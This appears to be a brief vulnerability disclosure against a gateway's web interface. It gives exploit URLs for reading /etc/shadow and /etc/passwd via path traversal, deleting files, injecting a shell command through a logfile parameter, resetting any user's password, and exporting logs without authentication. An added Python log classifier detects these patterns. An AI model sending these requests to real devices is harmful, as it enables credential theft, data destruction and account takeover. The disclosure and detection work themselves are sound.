The way this program is written...
Arbitrary file download
**.**.**.**/debug/rproxy_diag.php?action=download&filename=/etc/shadow
**.**.**.**/debug/rproxy_diag.php?action=tarfile&search=&logfile%5B%5D=../../../etc/passwd
Arbitrary file deletion and arbitrary command execution
Arbitrary file deletion:
https://202.***.208/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log&action=delete
Command execution:
https://202.***.208/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log;echo test >/Isc/third-party/httpd/htdocs/t.txt;&action=delete
Password reset for arbitrary users
Hilarious, you have to love it
https://202.***.208/vpnweb/resetpwd/resetpwd.php?action=update&UserId=2048&password1=test123456
There is no useful filtering here either, so injection is possible as well.
Logs can also be downloaded without authorization:
**.**.**.**/admin/export_log.php?type=syslog
**.**.**.**/admin/export_log.php?type=userflow
**.**.**.**/admin/export_log.php?type=userapp
**.**.**.**/admin/export_log.php?type=userlogin
**.**.**.**/admin/export_log.php?type=url
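
For defenders reviewing web access logs from an affected device, the following is an added example (not part of the original report and not the vendor's code) that classifies request targets by the parameter patterns listed above. It assumes that `/Isc/Log/` is the only legitimate log directory, because that is the only one the report's URLs show; the function name, the labels and the sample list are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qsl

LOG_DIR = "/Isc/Log/"  # assumption: the only log directory seen in the report's URLs
FILE_PARAMS = {"filename", "logfile[]"}  # file-path parameters named in the report
SHELL_META = re.compile(r"[;&|`$<>\r\n]")  # characters a shell treats specially


def classify(request_target):
    """Return sorted finding labels for one request target (path plus query)."""
    parts = urlsplit(request_target)
    # parse_qsl percent-decodes names and values, so logfile%5B%5D becomes logfile[]
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = set()
    for name, value in params:
        if name not in FILE_PARAMS:
            continue
        if SHELL_META.search(value):
            findings.add("shell-metacharacter")
        # Resolve the value the way a file API would, then check it stays in LOG_DIR.
        resolved = posixpath.normpath(posixpath.join(LOG_DIR, value))
        if not (resolved + "/").startswith(LOG_DIR):
            findings.add("path-outside-log-dir")
    names = {n for n, _ in params}
    # A reset request that names the account and the new password in the query string.
    if parts.path.endswith("/resetpwd.php") and {"UserId", "password1"} <= names:
        findings.add("password-reset-by-userid")
    return sorted(findings)


# Constructed request targets modelled on the URLs in the report above.
SAMPLES = [
    "/debug/rproxy_diag.php?action=download&filename=/etc/shadow",
    "/debug/rproxy_diag.php?action=tarfile&search=&logfile%5B%5D=../../../etc/passwd",
    "/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log&action=delete",
    "/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log%3Becho%20test&action=delete",
    "/vpnweb/resetpwd/resetpwd.php?action=update&UserId=2048&password1=test123456",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["no-parameter-finding"], target)
```

The third sample produces no finding because its parameters are well-formed; parameter checks cannot tell whether the caller was authorized, so any hit on these endpoints from an unexpected source still warrants review.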